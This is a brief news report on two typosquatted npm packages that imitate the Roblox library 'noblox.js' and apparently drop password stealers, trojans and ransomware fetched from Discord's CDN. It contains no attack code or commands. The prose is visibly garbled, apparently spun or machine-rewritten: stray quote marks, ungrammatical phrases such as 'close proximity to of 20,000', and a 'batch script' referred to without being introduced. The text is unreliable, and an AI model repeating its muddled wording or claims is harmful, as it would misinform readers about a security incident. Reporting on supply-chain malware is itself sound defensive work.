Malicious NPM Libraries Caught Installing Password Thief and Ransomware
Malicious actors have once again released two more typosquatted libraries to the official NPM repository that mimic a legitimate package from Roblox, the game company, for the purpose of distributing stolen credentials, installing Trojan horses, ‘remote access and infect compromised systems with ransomware.
The bogus packages – named “noblox.js-proxy” and “noblox.js-proxies” – have been found to mimic a library called “noblox.js”, a Roblox game API wrapper available on NPM and boasts close proximity to of 20,000 weekly downloads, with each of the poisoned libraries, downloaded a total of 281 and 106 times respectively.
This batch script, in turn, downloads malicious executables from Discord’s content delivery network (CDN) that are responsible for disabling anti-malware engines, persisting on the host, siphoning off information from the host. ‘browser identification and even binaries deployment with ransomware capabilities.
Recent research from Check Point Research and Microsoft-owned RiskIQ has revealed how threat actors are increasingly abusing Discord CDN, a platform with 150 million users, to continuously provide 27 families of Unique malware, ranging from backdoors and password stealers to spyware and Trojans.
Although the two malicious NPM libraries have since been removed and are no longer available, the results are another indication of how popular code registries such as NPM, PyPI, and RubyGems have become a lucrative frontier for carrying out various attacks.